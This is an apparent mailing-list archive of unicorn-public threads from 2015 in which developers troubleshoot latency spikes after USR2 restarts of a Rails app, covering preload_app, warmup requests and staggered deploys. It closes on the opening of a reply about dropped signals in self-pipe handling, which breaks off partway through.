>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-05 17:28  3%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:28 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: Eric Wong, Michael Fischer, unicorn-public

Braulio,

Are you referring to the vertical grey line? That is the deployment event.
The part that spikes in the first graph is request queue which is a bit
different on newrelic:
http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/

We are using HAProxy to load balance (round robin) to 4 physical hosts
running unicorn with 6 workers.

I have not tried to reproduce this on 1 master - I assume this would be the
same.

I do in fact do the sleep now:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
the deployment results above had the 1 second sleep in there.

On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> In the graphs you posted, what is the grey part? It is not described in
> the legend and it seems the problem is entirely there. What reverse proxy
> are you using?
>
> Can you reproduce this with a single master instance?
>
> Could you try this sleep:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>
>
> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Hey All,
>>
>> So I changed up my unicorn.rb a bit from my original post:
>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>
>> I'm also still sending the USR2 signals on deploy staggered with 30
>> second delay via capistrano:
>>
>> on roles(:web), in: :sequence, wait: 30
>>
>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>> would warmup the master). However, this is what a deploy looks like on
>> newrelic:
>>
>>
>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>
>>
>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>
>> I'm running out of ideas to get rid of thse latency spikes. Would you
>> guys recommend I try anything else at this point?
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Eric,
>>>
>>> Thanks for the quick reply.
>>>
>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>>> lazy loading - at least thats what all signs point to. I am going to try
>>> and mock request some url endpoints. Currently, I can only think of '/', as
>>> most other parts of the app require a session and auth. I'll report back
>>> with results.
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>
>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>> mfischer@zendesk.com>
>>>> > wrote:
>>>> >
>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>> is
>>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>>> > > requests that weren't automatically loaded during the preload
>>>> process.
>>>> > >
>>>> > > Eric, your thoughts?
>>>>
>>>> (top-posting corrected)
>>>>
>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>> autoloaded.
>>>>
>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>> 1.9.2
>>>>
>>>> > That does make sense - I was looking at another suggestion from a
>>>> user here
>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>> >
>>>> > The only issue I am having with the above solution is it is happening
>>>> in
>>>> > the before_fork block - shouldn't I warmup the connection in
>>>> after_fork?
>>>>
>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>> needs to be after_fork.
>>>>
>>>> > If
>>>> > I follow the above gist properly it warms up the server with the old
>>>> > activerecord base connection and then its turned off, then turned
>>>> back on
>>>> > in after_fork. I think I am not understanding the sequence of events
>>>> > there...
>>>>
>>>> With preload_app and warmup, you need to ensure any stream connections
>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>> child.
>>>>
>>>> > If this is the case, I should warmup and also check/kill the old
>>>> > master in the after_fork block after the new db, redis, neo4j
>>>> connections
>>>> > are all created. Thoughts?
>>>>
>>>> I've been leaving killing the master outside of the unicorn hooks
>>>> and doing it as a separate step; seemed too fragile to do it in
>>>> hooks from my perspective.
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
> --
> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
> ideologia. Morra por sua ideologia" P.R. Sarkar
>
> EITA - Educação, Informação e Tecnologias para Autogestão
> http://cirandas.net/brauliobo
> http://eita.org.br
>
> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
> destruídas nas fases de extroversão e introversão do fluxo imaginativo
> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
> naquele momento, essa pessoa é a única proprietária daquilo que ela
> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
> por um milharal também imaginado, a pessoa imaginada não é a propriedade
> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
> a propriedade deste universo é de Brahma, e não dos microcosmos que também
> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
> patrimônio comum de todos."
> Restante do texto em
> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 3%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  0%           ` Sarkis Varozian
@ 2015-03-04 20:27  0%             ` Michael Fischer
    1 sibling, 0 replies; 200+ results
From: Michael Fischer @ 2015-03-04 20:27 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

before_fork should work fine.  The children which will actually handle the
requests will inherit everything from the parent, including any libraries
that were loaded by the master process as a result of handling the mock
requests.  It'll also conserve memory, which is a nice benefit.

On Wed, Mar 4, 2015 at 12:24 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> That does make sense - I was looking at another suggestion from a user
> here (Braulio) of running a "warmup" using rack MockRequest:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork? If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then its turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there... If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?
>
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> I'm not exactly sure how preload_app works, but I suspect your app is
>> lazy-loading a number of Ruby libraries while handling the first few
>> requests that weren't automatically loaded during the preload process.
>>
>> Eric, your thoughts?
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Yes, preload_app is set to true, I have not made any changes to the
>>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>>
>>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>>> server with the highest response times: http://goo.gl/0HyUYt (in this
>>> graph: http://goo.gl/x7KcKq)
>>>
>>> Looks like it may be i/o related as you suspect - is there much I can do
>>> to alleviate that?
>>>
>>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> What does your I/O latency look like during this interval?  (iostat -xk
>>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>>> strongly correlated with I/O load.
>>>>
>>>> Also is preload_app set to true?  This should help.
>>>>
>>>> --Michael
>>>>
>>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> Michael,
>>>>>
>>>>> Thanks for this - I have since changed the way we are restarting the
>>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>>
>>>>> in :sequence, wait: 30
>>>>>
>>>>> We have 4 backends and the above will restart them sequentially,
>>>>> waiting 30s (which I think should be more than enough time), however, I
>>>>> still get the following latency spikes after a deploy:
>>>>> http://goo.gl/tYnLUJ
>>>>>
>>>>> This is what the individual servers look like for the same time
>>>>> interval: http://goo.gl/x7KcKq
>>>>>
>>>>>
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>>> wrote:
>>>>>
>>>>>> If the response times are falling a minute or so after the reload,
>>>>>> I'd chalk it up to a cold CPU cache.  You will probably want to stagger
>>>>>> your reloads across backends to minimize the impact.
>>>>>>
>>>>>> --Michael
>>>>>>
>>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>>> wrote:
>>>>>>
>>>>>>> We have a rails application with the following unicorn.rb:
>>>>>>> http://goo.gl/qZ5NLn
>>>>>>>
>>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>>> unicorn
>>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>>> workers come online.
>>>>>>>
>>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is
>>>>>>> inconsistent -
>>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>>> is
>>>>>>> higher than previous deploys.
>>>>>>>
>>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>>> tools/profilers to use to get to the bottom of this? Should we
>>>>>>> expect this
>>>>>>> to happen on each deploy?
>>>>>>>
>>>>>>> Thanks,
>>>>>>>
>>>>>>> --
>>>>>>> *Sarkis Varozian*
>>>>>>> svarozian@gmail.com
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:17  0%         ` Michael Fischer
@ 2015-03-04 20:24  0%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
    0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:24 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

That does make sense - I was looking at another suggestion from a user here
(Braulio) of running a "warmup" using rack MockRequest:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77

The only issue I am having with the above solution is it is happening in
the before_fork block - shouldn't I warmup the connection in after_fork? If
I follow the above gist properly it warms up the server with the old
activerecord base connection and then its turned off, then turned back on
in after_fork. I think I am not understanding the sequence of events
there... If this is the case, I should warmup and also check/kill the old
master in the after_fork block after the new db, redis, neo4j connections
are all created. Thoughts?

On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> I'm not exactly sure how preload_app works, but I suspect your app is
> lazy-loading a number of Ruby libraries while handling the first few
> requests that weren't automatically loaded during the preload process.
>
> Eric, your thoughts?
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Yes, preload_app is set to true, I have not made any changes to the
>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>
>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>> server with the highest response times: http://goo.gl/0HyUYt (in this
>> graph: http://goo.gl/x7KcKq)
>>
>> Looks like it may be i/o related as you suspect - is there much I can do
>> to alleviate that?
>>
>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> What does your I/O latency look like during this interval?  (iostat -xk
>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>> strongly correlated with I/O load.
>>>
>>> Also is preload_app set to true?  This should help.
>>>
>>> --Michael
>>>
>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Michael,
>>>>
>>>> Thanks for this - I have since changed the way we are restarting the
>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>
>>>> in :sequence, wait: 30
>>>>
>>>> We have 4 backends and the above will restart them sequentially,
>>>> waiting 30s (which I think should be more than enough time), however, I
>>>> still get the following latency spikes after a deploy:
>>>> http://goo.gl/tYnLUJ
>>>>
>>>> This is what the individual servers look like for the same time
>>>> interval: http://goo.gl/x7KcKq
>>>>
>>>>
>>>>
>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>> wrote:
>>>>
>>>>> If the response times are falling a minute or so after the reload, I'd
>>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>>> reloads across backends to minimize the impact.
>>>>>
>>>>> --Michael
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>> wrote:
>>>>>
>>>>>> We have a rails application with the following unicorn.rb:
>>>>>> http://goo.gl/qZ5NLn
>>>>>>
>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>> unicorn
>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>> workers come online.
>>>>>>
>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent
>>>>>> -
>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>> is
>>>>>> higher than previous deploys.
>>>>>>
>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>>> this
>>>>>> to happen on each deploy?
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> --
>>>>>> *Sarkis Varozian*
>>>>>> svarozian@gmail.com
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:58  0%       ` Sarkis Varozian
@ 2015-03-04 20:17  0%         ` Michael Fischer
  2015-03-04 20:24  0%           ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-04 20:17 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

I'm not exactly sure how preload_app works, but I suspect your app is
lazy-loading a number of Ruby libraries while handling the first few
requests that weren't automatically loaded during the preload process.

Eric, your thoughts?

--Michael

On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Yes, preload_app is set to true, I have not made any changes to the
> unicorn.rb from OP: http://goo.gl/qZ5NLn
>
> Hmmmm, you may be onto something - Here is the i/o metrics from the server
> with the highest response times: http://goo.gl/0HyUYt (in this graph:
> http://goo.gl/x7KcKq)
>
> Looks like it may be i/o related as you suspect - is there much I can do
> to alleviate that?
>
> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> What does your I/O latency look like during this interval?  (iostat -xk
>> 10, look at the busy %).  I'm willing to bet the request queueing is
>> strongly correlated with I/O load.
>>
>> Also is preload_app set to true?  This should help.
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Michael,
>>>
>>> Thanks for this - I have since changed the way we are restarting the
>>> unicorn servers after a deploy by changing capistrano task to do:
>>>
>>> in :sequence, wait: 30
>>>
>>> We have 4 backends and the above will restart them sequentially, waiting
>>> 30s (which I think should be more than enough time), however, I still get
>>> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>>>
>>> This is what the individual servers look like for the same time
>>> interval: http://goo.gl/x7KcKq
>>>
>>>
>>>
>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> If the response times are falling a minute or so after the reload, I'd
>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>> reloads across backends to minimize the impact.
>>>>
>>>> --Michael
>>>>
>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> We have a rails application with the following unicorn.rb:
>>>>> http://goo.gl/qZ5NLn
>>>>>
>>>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>>>> master which spins up a new master and we use the before_fork in the
>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>> workers come online.
>>>>>
>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>>>> there is always a latency spike - however, at times Request Queueing is
>>>>> higher than previous deploys.
>>>>>
>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>> this
>>>>> to happen on each deploy?
>>>>>
>>>>> Thanks,
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:51  0%     ` Michael Fischer
@ 2015-03-04 19:58  0%       ` Sarkis Varozian
  2015-03-04 20:17  0%         ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 19:58 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Yes, preload_app is set to true, I have not made any changes to the
unicorn.rb from OP: http://goo.gl/qZ5NLn

Hmmmm, you may be onto something - Here is the i/o metrics from the server
with the highest response times: http://goo.gl/0HyUYt (in this graph:
http://goo.gl/x7KcKq)

Looks like it may be i/o related as you suspect - is there much I can do to
alleviate that?

On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
wrote:

> What does your I/O latency look like during this interval?  (iostat -xk
> 10, look at the busy %).  I'm willing to bet the request queueing is
> strongly correlated with I/O load.
>
> Also is preload_app set to true?  This should help.
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Michael,
>>
>> Thanks for this - I have since changed the way we are restarting the
>> unicorn servers after a deploy by changing capistrano task to do:
>>
>> in :sequence, wait: 30
>>
>> We have 4 backends and the above will restart them sequentially, waiting
>> 30s (which I think should be more than enough time), however, I still get
>> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>>
>> This is what the individual servers look like for the same time interval:
>> http://goo.gl/x7KcKq
>>
>>
>>
>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> If the response times are falling a minute or so after the reload, I'd
>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>> reloads across backends to minimize the impact.
>>>
>>> --Michael
>>>
>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> We have a rails application with the following unicorn.rb:
>>>> http://goo.gl/qZ5NLn
>>>>
>>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>>> master which spins up a new master and we use the before_fork in the
>>>> unicorn.rb config above to send signals to the old master as the new
>>>> workers come online.
>>>>
>>>> I've been trying to debug a weird issue that manifests as "Request
>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>> deployment (represented by the vertical lines). Here is the graph:
>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>>> there is always a latency spike - however, at times Request Queueing is
>>>> higher than previous deploys.
>>>>
>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>> this
>>>> to happen on each deploy?
>>>>
>>>> Thanks,
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>>
>>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:48  3%   ` Sarkis Varozian
@ 2015-03-04 19:51  0%     ` Michael Fischer
  2015-03-04 19:58  0%       ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-04 19:51 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

What does your I/O latency look like during this interval?  (iostat -xk 10,
look at the busy %).  I'm willing to bet the request queueing is strongly
correlated with I/O load.

Also is preload_app set to true?  This should help.

--Michael

On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Michael,
>
> Thanks for this - I have since changed the way we are restarting the
> unicorn servers after a deploy by changing capistrano task to do:
>
> in :sequence, wait: 30
>
> We have 4 backends and the above will restart them sequentially, waiting
> 30s (which I think should be more than enough time), however, I still get
> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>
> This is what the individual servers look like for the same time interval:
> http://goo.gl/x7KcKq
>
>
>
> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> If the response times are falling a minute or so after the reload, I'd
>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>> reloads across backends to minimize the impact.
>>
>> --Michael
>>
>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> We have a rails application with the following unicorn.rb:
>>> http://goo.gl/qZ5NLn
>>>
>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>> master which spins up a new master and we use the before_fork in the
>>> unicorn.rb config above to send signals to the old master as the new
>>> workers come online.
>>>
>>> I've been trying to debug a weird issue that manifests as "Request
>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>> deployment (represented by the vertical lines). Here is the graph:
>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>> there is always a latency spike - however, at times Request Queueing is
>>> higher than previous deploys.
>>>
>>> Any ideas on what exactly is going on here? Any suggestions on
>>> tools/profilers to use to get to the bottom of this? Should we expect
>>> this
>>> to happen on each deploy?
>>>
>>> Thanks,
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>>
>>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-04 19:48  3%   ` Sarkis Varozian
  2015-03-04 19:51  0%     ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 19:48 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael,

Thanks for this - I have since changed the way we are restarting the
unicorn servers after a deploy by changing capistrano task to do:

in :sequence, wait: 30

We have 4 backends and the above will restart them sequentially, waiting
30s (which I think should be more than enough time), however, I still get
the following latency spikes after a deploy: http://goo.gl/tYnLUJ

This is what the individual servers look like for the same time interval:
http://goo.gl/x7KcKq



On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> If the response times are falling a minute or so after the reload, I'd
> chalk it up to a cold CPU cache.  You will probably want to stagger your
> reloads across backends to minimize the impact.
>
> --Michael
>
> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> We have a rails application with the following unicorn.rb:
>> http://goo.gl/qZ5NLn
>>
>> When we deploy to the application, a USR2 signal is sent to the unicorn
>> master which spins up a new master and we use the before_fork in the
>> unicorn.rb config above to send signals to the old master as the new
>> workers come online.
>>
>> I've been trying to debug a weird issue that manifests as "Request
>> Queueing" in our Newrelic APM. The graph shows what happens after a
>> deployment (represented by the vertical lines). Here is the graph:
>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>> there is always a latency spike - however, at times Request Queueing is
>> higher than previous deploys.
>>
>> Any ideas on what exactly is going on here? Any suggestions on
>> tools/profilers to use to get to the bottom of this? Should we expect this
>> to happen on each deploy?
>>
>> Thanks,
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>>
>>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 3%]

* Re: Bug, Unicorn can drop signals in extreme conditions
  2015-02-16  2:19  4% Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
@ 2015-02-18  9:15  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-18  9:15 UTC (permalink / raw)
  To: Steven Stewart-Gallus; +Cc: unicorn-public, Jesse Storimer

Steven Stewart-Gallus <sstewartgallus00@mylangara.bc.ca> wrote:
> Hello,
> 
> While reading the article at
> http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
> that the signal handling code shown there and of the same type in your
> application is broken.  As you have a single nonblocking pipe in your
> application you can drop signals entirely (and not just fold multiple
> signals of the same type into one).  The simplest fix is to use a pipe
> for each individual type of signal or to just use pselect or similar.
> I'm pretty sure that there is a way to use a single pipe but it seems
> complicated and very difficult to implement correctly.

(I've Cc-ed Jesse for this)

I wasn't sure exactly what you were referring to, but now I see where
the sitepoint.com article makes calls in the wrong order:

     self_writer.write_nonblock('.') # XXX may fail!
     SIGNAL_QUEUE << signal

